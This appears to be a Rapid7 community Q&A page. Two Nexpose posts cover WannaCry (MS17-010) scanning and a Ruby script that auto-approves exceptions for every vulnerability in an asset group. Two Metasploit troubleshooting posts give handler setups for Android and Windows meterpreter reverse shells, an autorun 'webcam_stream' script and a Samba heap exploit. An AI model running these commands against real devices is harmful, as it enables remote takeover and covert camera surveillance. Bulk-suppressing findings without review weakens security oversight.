Knowledge Base

Ask A Question

Questions

4
ANSWERED

Nexpose: WannaCry - Scanning & Reporting [00jay]

In light of the recent WannaCry Ransomware attacks, I thought it'd be great to share ways of finding out which assets are susceptible to this attack. 1. Create a custom scan template to check for MS17-010 The easiest way to create a Custom template is by making a copy of an existing template: * Administration tab -> Templates * Click: "Manage" * Copy "Full audit enhanced logging without Web Spider" Template * IMPORTANT: Name your copy of the scan template * Click: "Vulnerability Checks" tab * Expand: "By Individual Check" dropdown * Click: "Add Checks" button * Enter: MS17-010 (As of 5/15/17, there are 192 individual checks) Be sure to remove all checks from the "By Category" and "By Check Type" sections to ensure that only the individual checks are loaded for the scan(s). 2. If you want to create a Dynamic Asset Group (DAG) for assets vulnerable to this attack: * Create a new DAG with the following filters: > 'CVE ID' 'is' CVE-2017-0143 > 'CVE ID' 'is' CVE-2017-0144 > 'CVE ID' 'is' CVE-2017-0145 > 'CVE ID' 'is' CVE-2017-0146 > 'CVE ID' 'is' CVE-2017-0147 > 'CVE ID' 'is' CVE-2017-0148 Change "Match (all) of the specified filters." to "Match (any) of the specified filters." Hit "SEARCH". You should then have a result of all assets that have ANY of those CVEs specified above. 3. You can also create a SQL report to list ANY asset affected by ANY of the 6 CVEs: ```sql SELECT da.ip_address AS "IP Adress", da.host_name AS "Host Name", dv.title AS "Title", dv.description AS "Description", dv.severity AS "Severity" FROM dim_vulnerability dv JOIN dim_asset_vulnerability_solution das USING(vulnerability_id) JOIN dim_asset da USING(asset_id) WHERE title ILIKE '%2017-0143%' OR title ILIKE '%2017-0144%' OR title ILIKE '%2017-0145%' OR title ILIKE '%2017-0146%' OR title ILIKE '%2017-0147%' OR title ILIKE '%2017-0148%' ``` (Please keep in mind that it will list every instance of any of the CVEs in question.) There are currently 32 checks for each CVE, there are 6 CVEs; a total of 192 checks. However, an asset should not list more than one check for each CVE which should result at most 6 instances per asset. You can create a SQL query to check for only the count or unique instances that way the report contains less rows.

Posted by Edward Sheehy about a year ago

2
ANSWERED

Metasploit: I am experiencing a problem with multi_console_command [Leonardo Gintoli]

Hi, I'm having problems with the multi_console_command component in Metasploit. This is what I run in the msfconsole: ~~~~ Use exploit/multi/handler Set payload android/meterpreter/ reverse_tcp Set LHOST 192.168.0.240 Set LPORT 3460 Set ExitOnSession false Set AutoRunScript multi_console_command -rc scriptcamandroid.rc Exploit -j -z ~~~~ In the Metasploit root, the file `scriptcamandroid.rc` has the following commands: ~~~~ webcam_stream -i 2 -q 45 -d 84000 exit ~~~~ After Metasploit opens the session, it automatically starts autorun with this multi console command: ~~~~ Session ID 1 (192.168.0.240:3460 -> xxx.xxx.xxx.xxx:52894) processing AutoRunScript 'multi_console_command -rc scriptcamandroid.rc' Multi Command Execution Meterpreter Script Console ~~~~ OPTIONS: ~~~~ -cl <opt> Commands to execute. The command must be enclosed in double quotes and separated by a comma. -h Help menu. -rc <opt> Text file with list of commands, one per line. -sl Hide commands for work in background sessions ~~~~ The script commands are not executed. This problem has been present since I updated Metasploit through msfupdate and updated the linux kernel. I tried a clean install of Ubuntu and reinstalled Metasploit, but the problem remains. Then I tried with an old version of Kali that had not been upgraded, and it works perfectly. I also tried using an old version of Metasploit with Ubuntu updated, but the bug remains.

Posted by Stephanie Coyle about a year ago

1
ANSWERED

Metasploit: I receive a msfcli error when experimenting with Kali Linux [hcl]

I just started my experiments with Metasploit on Kali Linux Here's what I did: ~~~~ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=443 E ~~~~ pivoting to another: ~~~~ msf exploit(handler) > search samba [!] Database not connected or cache not built, using slow search ~~~~ However, `db_rebuild_cache` did not help. ~~~~ msf exploit(handler) > use exploit/linux/samba/lsa_transnames_heap msf exploit(lsa_transnames_heap) > set PAYLOAD linux/x86/shell/reverse_tcp [-] The value specified for PAYLOAD is not valid. msf exploit(lsa_transnames_heap) > show payloads msf exploit(lsa_transnames_heap) > ~~~~ Is there a reason why there are no payloads? The same payload loads fine in msfconsole. After that I did some testing and scrolling commands, and this error pops up: ~~~~ m[-] RbReadline Error: TypeError no implicit conversion from nil to integer ["/opt/metasploit/apps/pro/msf3/lib/rbreadline.rb:2770:in `[]'", "/opt/metasploit/apps/pro/msf3/lib/rbreadline.rb:2770:in `update_line'", "/opt/metasploit/apps/pro/msf3/lib/rbreadline.rb:3526:in `block in rl_redisplay'", "/opt/metasploit/apps/pro/msf3/lib/rbreadline.rb:3521:in `each'", "/opt/metasploit/apps/pro/msf3/lib/rbreadline.rb:3521:in `rl_redisplay'", "/opt/metasploit/apps/pro/msf3/lib/rbreadline.rb:4665:in `_rl_internal_char_cleanup'", "/opt/metasploit/apps/pro/msf3/lib/rbreadline.rb:4726:in `readline_internal_charloop'", "/opt/metasploit/apps/pro/msf3/lib/rbreadline.rb:4790:in `readline_internal'", "/opt/metasploit/apps/pro/msf3/lib/rbreadline.rb:4812:in `readline'", "/opt/metasploit/apps/pro/msf3/lib/readline_compatible.rb:77:in `readline'", "/opt/metasploit/apps/pro/msf3/lib/rex/ui/text/input/readline.rb:90:in `pgets'", "/opt/metasploit/apps/pro/msf3/lib/rex/ui/text/shell.rb:184:in `run'", "/opt/metasploit/apps/pro/msf3/msfconsole:169:in `<main>'"] ~~~~ Well, after that I gave it another shot and here what I received: ~~~~ msf exploit(handler) > use exploit/linux/samba/lsa_transnames_heap msf exploit(lsa_transnames_heap) > set PAYLOAD linux/x86/shell/reverse_tcp PAYLOAD => linux/x86/shell/reverse_tcp msf exploit(lsa_transnames_heap) > show options Module options (exploit/linux/samba/lsa_transnames_heap): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 445 yes Set the SMB service port SMBPIPE LSARPC yes The pipe name to use [-] Invalid payload defined: linux/x86/shell/reverse_tcp ~~~~ The first two problems appear on two different machines. The other two did not try to replicate "database not connected" and "payload problem." Is msfcli being deprecated?

Posted by Stephanie Coyle about a year ago

1
ANSWERED

Nexpose: Exclude All Vulnerabilities in an Asset Group [Kyle Burk]

It's not unheard of for me to recieve a request to whitelist a particular subset of machines in Nexpose. After looking around on the forums and contacting Rapid7 support, I was told it is not possible to exclude all vulnerabilities in an asset group. Then I saw Chris Brown's script where he excludes a single vuln across an asset group. So I decided to learn some ruby and came up with our own solution. Excuse my lack of formatting and the places where I didn't know how to handle certain input (I promise it still works). If you need a similar solution, you can run this script: ~~~~ruby #!/usr/bin/env ruby require 'nexpose' require 'highline/import' # Default values @host = 'nexpose.domain.com' @port = 3780 puts "Connecting to Nexpose Console..." puts "" puts "" puts "" puts "Please input your username for nexpose." puts "" puts "" puts "" def get_username(prompt = 'Username: ') ask(prompt) { |query| query.echo = true } end @user = get_username puts "Please input your password." puts "" puts "" puts "" def get_password(prompt = 'Password: ') ask(prompt) { |query| query.echo = false } end @password = get_password puts "logging in..." #create object for the nexpose connection nsc = Nexpose::Connection.new(@host, @user, @password, @port) nsc.login puts "listing asset groups..." #query list of asset groups assetGroupList = nsc.list_asset_groups assetGroupList.each do |groupid| puts "GroupID: #{groupid.id} --- Group Name: #{groupid.name}" end puts "" puts "" puts "" def get_target(prompt = 'Please input target group ID') ask(prompt) {|query| query.echo = true } end @target = get_target t = @target.to_i puts "" puts "" puts "" puts "-----------------------------------------------" puts "We will now begin excluding all vulnerabilities" puts "on all assets in the selected asset group." puts "-----------------------------------------------" puts "" puts "" puts "" puts "Please select a reason for the Exception" puts "I haven't figured out how to handle 'other' yet" puts "so if you choose anything other than what is " puts "below, I'm going to make this script exit." puts "" puts "1 -- False Positive" puts "2 -- Compensating Control" puts "3 -- Acceptable Use" puts "4 -- Acceptable Risk" def get_reason(prompt = 'Select Your Reason (1-5):') ask(prompt) {|query| query.echo = true } end rsn = get_reason case rsn when "1" rsn = Nexpose::VulnException::Reason::FALSE_POSITIVE when "2" rsn = Nexpose::VulnException::Reason::COMPENSATING_CONTROL when "3" rsn = Nexpose::VulnException::Reason::ACCEPTABLE_USE when "4" rsn = Nexpose::VulnException::Reason::ACCEPTABLE_RISK else puts "I dont know how to handle other, exiting now." abort end puts "" puts "" puts "" puts "Please enter the comment/justification for the exclusion. ('EXC-1234')" def get_comment(prompt = 'Comment:') ask(prompt) {|query| query.echo = true } end @comment = get_comment puts "" puts "" puts "" puts "To properly format the expiration date, we need to collect" puts " the month, day and year separately. sorry about this." def get_year(prompt = 'Provide the expiration year (1999):') ask(prompt) {|query| query.echo = true } end @year = get_year y = @year.to_i puts "" puts "" puts "" def get_month(prompt = 'Provide the 2-digit expiration month (12):') ask(prompt) {|query| query.echo = true } end @month = get_month m = @month.to_i puts "" puts "" puts "" def get_day(prompt = 'Provide the 2-digit expiration day (22):') ask(prompt) {|query| query.echo = true } end @day = get_day d = @day.to_i expiration_date = Date.new(y,m,d).to_date review_comments = "Auto approved by submitter." scope = Nexpose::VulnException::Scope::ALL_INSTANCES_ON_A_SPECIFIC_ASSET assets = nsc.group_assets(t) assets.each do |asset| vulns = nsc.list_asset_vulns(asset.id) vulns.each do |vuln| exc = Nexpose::VulnException.new(vuln.id, scope, rsn) exc.asset_id = asset.id exc.save(nsc, @comment) exc.update_expiration_date(nsc, expiration_date) exc.approve(nsc, review_comments) end end ~~~~

Posted by Edward Sheehy about a year ago